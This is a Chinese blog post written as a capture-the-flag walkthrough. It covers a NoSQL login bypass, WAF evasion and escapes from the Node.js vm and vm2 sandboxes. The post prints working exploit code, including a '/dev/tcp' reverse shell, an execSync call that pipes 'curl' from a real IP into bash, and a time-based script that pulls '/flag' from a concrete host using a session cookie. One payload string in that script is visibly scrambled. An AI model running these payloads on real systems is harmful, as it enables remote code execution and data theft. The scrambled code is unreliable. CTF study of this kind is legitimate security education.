                print(f"\n{target_type} {table_index} 完成: {result}")
                if not result:
                    break
                table_index += 1
                pos = 0
                result = ""
            else:
                print(f"\nFlag: {result}")
                return result

        pos += 1

    return result


def main():
    while True:
        print("\n[+] 请选择要执行的操作:")
        print("1. 爆破数据库名")
        print("2. 爆破表名")
        print("3. 爆破列名")
        print("4. 爆破flag")
        print("5. 执行所有操作")
        print("0. 退出")

        choice = input("\n请输入选项 (0-5): ").strip()

        if choice == "0":
            print("\n[+] 程序退出")
            break

        elif choice == "1":
            print("\n[+] 开始枚举数据库名称...")
            database = blind_injection("database")
            print(f"[+] 最终数据库名称: {database}")

        elif choice == "2":
            print("\n[+] 开始枚举表名...")
            tables = blind_injection("table")
            print(f"[+] 表名枚举完成")

        elif choice == "3":
            print("\n[+] 开始枚举列名...")
            columns = blind_injection("column")
            print(f"[+] 列名枚举完成")

        elif choice == "4":
            print("\n[+] 开始爆破flag...")
            flag = blind_injection("flag")
            print(f"[+] 最终flag: {flag}")

        elif choice == "5":
            print("\n[+] 开始执行所有操作...")

            print("\n[+] 开始枚举数据库名称...")
            database = blind_injection("database")
            print(f"[+] 最终数据库名称: {database}")

            print("\n[+] 开始枚举表名...")
            tables = blind_injection("table")
            print(f"[+] 表名枚举完成")

            print("\n[+] 开始枚举列名...")
            columns = blind_injection("column")
            print(f"[+] 列名枚举完成")

            print("\n[+] 开始爆破flag...")
            flag = blind_injection("flag")
            print(f"[+] 最终flag: {flag}")

        else:
            print("\n[-] 无效的选项,请重新输入")

        input("\n按回车键继续...")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[+] 程序被用户中断")
    except Exception as e:
        print(f"\n[-] 发生错误: {e}")

noSandbox

image-20241203112442376

主要考:Node.js + MongoDB 应用的 NoSQL 注入与 VM 沙箱逃逸

1.NoSQL 注入绕过登录认证

mongodb的nosql注入参考:Nosql 注入从零到一 - 先知社区

这里用 MongoDB 的比较符实现永真式绕过登陆限制 从而实现任意登陆

{"username":{"$ne":1},"password": {"$ne":1}}

image-20241203093455932

image-20241203093516957

登录成功获取到cookie后服务/execute路由

2.VM 沙箱逃逸执行任意代码

源代码:

const vm = require('vm');

function waf(code, res) {
    let pattern = /(find|ownKeys|fromCharCode|includes|\'|\"|replace|fork|reverse|fs|process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function|env)/m;
    if (code.match(pattern)) {
        console.log('WAF detected malicious code');
        res.status(403).send('WAF detected malicious code');
        exit();
    }
}

app.post('/execute', upload.none(), (req, res) => {
    let code = req.body.code;
    const token = req.cookies.token;
    if (!token) {
        return res.status(403).send('Missing execution code credentials.');
    }
    if (!jwt.verify(token, JWT_SECRET)) {
        return res.status(403).send('Invalid token provided.');
    }
    console.log(`Received code for execution: ${code}`);
    try {
        waf(code, res);
        let sandbox = Object.create(null);
        let context = vm.createContext(sandbox);
        let script = new vm.Script(code);
        console.log('Executing code in sandbox context');
        script.runInContext(context);
        console.log(`Code executed successfully. Result: ${sandbox.result || 'No  result returned.'}`);
        res.json('Code executed successfully');
    } catch (err) {
        console.error(`Error executing code: ${err.message}`);
        res.status(400).send(`Error: there's no display back here,may be it  executed successfully?`);
    }
});

WAF 绕过

WAF 使用正则表达式过滤了 find、ownKeys、fromCharCode 等多个敏感关键字。然而,可以利用 Node.js 的模板字符串特性,将关键字分解并重新组合,例如:

原始关键字绕过方式
process${${proce}ss}
prototype${${prototyp}e}
require${${requir}e}
execSync${${exe}cSync}
child_process${${child_proces}s}

参考文档:Node.js 模板字符串

沙箱逃逸

参考:NodeJS VM和VM2沙箱逃逸 - 先知社区

由于 VM 沙箱的初始上下文是 Object.create(null),许多全局对象和方法不可直接访问。可以利用 JavaScript 的一些技巧来获取对 process 对象的访问权限,进而调用 child_process 模块执行任意系统命令。

image-20241203093645455

漏洞利用

可以提交以下代码绕过 WAF 并实现沙箱逃逸,curl反弹shell 到服务器来做到绕waf:

首先,在攻击者vps的web目录里面创建一个index文件(index.php或index.html),内容如下:

bash -i >& /dev/tcp/ip/8000 0>&1

然后再目标机上执行如下,即可反弹shell:

curl ip|bash

image-20241203122617852

image-20241203122605728

throw new Proxy({}, {
  get: function() {
    const cc = arguments.callee.caller;
    const p = (cc.constructor.constructor(`${`${`return proc`}ess`}`))();
    chi = p.mainModule.require(`${`${`child_proces`}s`}`);
    res = Reflect.get(chi, `${`${`exe`}cSync`}`)(`curl 149.88.79.51:8000 | bash`);
    return res.toString();
  }
});

利用 arguments.callee.caller 获取当前函数的调用者,进而获取 process 对象,然后使用 child_process.execSync 执行反弹 shell 的命令。

escapeSandbox_PLUS

image-20241203112417473

# 考点: Js大小写转换缺陷+VM2逃逸+受限环境下的文件读取

## 题目概述

本题直接给出了源码和Dockerfile。

**Dockerfile:**

FROM node:18-alpine
WORKDIR /app
COPY ./app /app
COPY ./flag /flag
EXPOSE 3000
CMD ["node","/app/app.js"]


**目的有两个:**

1. 最直接的,我们可以显而易见的知道 flag 位于 /flag。
2. 我们知道镜像是 alpine 环境,是轻量发行版,本身没有很多命令和功能,同时也没有办法通过 /dev/tcp/反弹shell 实现出网,所以这是一个非标准环境。

**源码 (app.js):**

const express = require('express');
const bodyParser = require('body-parser');
const session = require('express-session');
const multer = require('multer');
const { VM } = require('vm2');
const crypto = require('crypto');
const path = require('path');
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'public')));
const sessionSecret = crypto.randomBytes(64).toString('hex');
app.use(session({ secret: sessionSecret, resave: false, saveUninitialized: true, }));
const upload = multer();

app.post('/login', (req, res) => {

const { username, passwd } = req.body;
if (username.toLowerCase() !== 'syclover' && username.toUpperCase() === 'SYCLOVER' && passwd === 'J1rrY') {
    req.session.isAuthenticated = true;
    res.json({ message: 'Login successful' });
} else {
    res.status(401).json({ message: 'Invalid credentials' });
}

});

const isAuthenticated = (req, res, next) => {

if (req.session.isAuthenticated) {
    next();
} else {
    res.status(403).json({ message: 'Not authenticated' });
}

};

app.post('/execute', isAuthenticated, upload.none(), (req, res) => {

let code = req.body.code;
let flag = false;
for (let i = 0; i < code.length; i++) {
    if (flag || "/(abcdefghijklmnopqrstuvwxyz123456789'\".".split``.some(v => v === code[i])) {
        flag = true;
        code = code.slice(0, i) + "*" + code.slice(i + 1, code.length);
    }
}
try {
    const vm = new VM({
        sandbox: {
            require: undefined,
            setTimeout: undefined,
            setInterval: undefined,
            clearTimeout: undefined,
            clearInterval: undefined,
            console: console
        }
    });
    const result = vm.run(code.toString());
    console.log('执行结果:', result);
    res.json({ message: '代码执行成功', result: result });
} catch (e) {
    console.error('执行错误:', e);
    res.status(500).json({ error: '代码执行出错', details: e.message });
}

});

app.get('/', (req, res) => {

res.sendFile(path.join(__dirname, 'public', 'index.html'));

});

process.on('uncaughtException', (err) => {

console.error('捕获到未处理的异常:', err);

});

process.on('unhandledRejection', (reason, promise) => {

console.error('捕获到未处理的 Promise 错误:', reason);

});

setTimeout(() => {

throw new Error("模拟的错误");

}, 1000);

setTimeout(() => {

Promise.reject(new Error("模拟的 Promise 错误"));

}, 2000);

app.listen(3000, () => {

console.log('Server is running on port 3000');

});


###  Js大小写转换缺陷

**漏洞代码:**

if (username.toLowerCase() !== 'syclover' && username.toUpperCase() === 'SYCLOVER' && passwd === 'J1rrY') {

req.session.isAuthenticated = true;
res.json({ message: 'Login successful' });

}


- **漏洞点:** 应用在登录验证时,使用了 toLowerCase 和 toUpperCase 进行用户名大小写校验,但这种方式存在缺陷,无法正确处理一些特殊字符。
- **利用方式:** 使用特殊字符 ſ (U+017F) 绕过校验。用户名:ſyclover,密码:J1rrY,即可成功登录。
- **原理参考:** [https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html](https://www.google.com/url?sa=E&q=https%3A%2F%2Fwww.leavesongs.com%2FHTML%2Fjavascript-up-low-ercase-tip.html)

### VM2利用

加强版? 沙箱逃逸的最后一舞。题目描述为什么是 “最后一舞”,因为 VM2 已经停止维护了,没有安全更新,安全问题有很多。

![alt text](https://pub-19889aa796794ab69d2cb488c86985b2.r2.dev/yu4xr/2024/12/202412031914244.png)



选择最新的一个逃逸 poc:

const { VM } = require("vm2");
const vm = new VM();

const code = `
const customInspectSymbol = Symbol.for('nodejs.util.inspect.custom');

obj = {

[customInspectSymbol]: (depth, opt, inspect) => {
    inspect.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');
},
valueOf: undefined,
constructor: undefined,

}

WebAssembly.compileStreaming(obj).catch(()=>{});
`;

vm.run(code);




这里对执行代码做了简单过滤,可以利用数组绕过的 code.length 和 code.slice 的判断:

for (let i = 0; i < code.length; i++) {

if (flag || "/(abcdefghijklmnopqrstuvwxyz123456789'\".".split``.some(v => v === code[i])) {
    flag = true;
    code = code.slice(0, i) + "*" + code.slice(i + 1, code.length);
}

}




### 受限下读取flag

方法不唯一,可以命令盲注,或者写入将结果写入 index.html。

### 3.1 命令盲注

**核心思想:**

通过执行命令,并根据命令执行结果的不同表现(比如响应时间)来判断 flag 的每一位字符。

**利用方式:**

使用 child_process.execSync 执行命令,并结合 sleep 命令和 cut 命令来逐位判断 flag 字符。

python
import requests
import json
import time

ses=requests.session()
headers = {

"Cookie":  "connect.sid=s%3ACC5HrKxuuyPDUyXDa0tcKf0IwCV3lH76.sBoWbVb14R6MwYyiNCAUmj5pBh7NJy bFeaDbyaVKSGg",

}
url = "http://119.29.157.248:89/execute"
pos=1
flag=""
while True:

strs="1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-}_"
for i in strs:
    data = {
        "code[]": "async function fn() {    Error().stack;      stack();    (function stack() {      })();}p = fn();p.constructor = {    [Symbol.species]: class FakePromise {      new  (x) => x,          )      }    constructor(executor) {        (err) => { return  }};p.then();"%(str(pos),i) executor(          err.constructor.constructor('return process') ().mainModule.require('child_process').execSync('sleep $(cat /flag| cut -c%s | tr  %s 2)'); }        } "
    }
    t1=time.time()
    req1=ses.post(url, headers=headers, data=data)
    print(req1.text)
    t2=time.time()
    print(i+str(t2-t1))
    if(t2-t1>2): #如果时间大于2秒,说明匹配到了
        pos+=1
        flag+=i
        print(flag)
        break
if(flag[-1]=="}"): #判断flag是否结束
    break

### 3.2 写入静态文件

通过 VM2 逃逸执行命令,将 /flag 文件内容写入 public/index.html 文件。

async function fn() {
Error().stack;
stack();
(function stack() {})();
}

p = fn();
p.constructor = {

constructor(executor) {
  executor(
    (x) => x,
    (err) => {
      return err.constructor.constructor('return process')()
        .mainModule.require('child_process')
        .execSync('cat /flag > public/index.html');
    }
  );
}

}
};

p.then();

© 版权声明
THE END
喜欢就支持一下吧
点赞 90 分享 收藏
评论 共2条
取消
  1. 头像
    bjoocppetm
    Windows 10 · Google Chrome

    这篇文章如同一首动人的乐章,触动了读者内心深处的柔软。

    回复
  2. 头像
    tttyvqlrnt
    Windows 10 · Google Chrome

    技术伦理的探讨体现人文科技平衡意识。

    回复
易航博客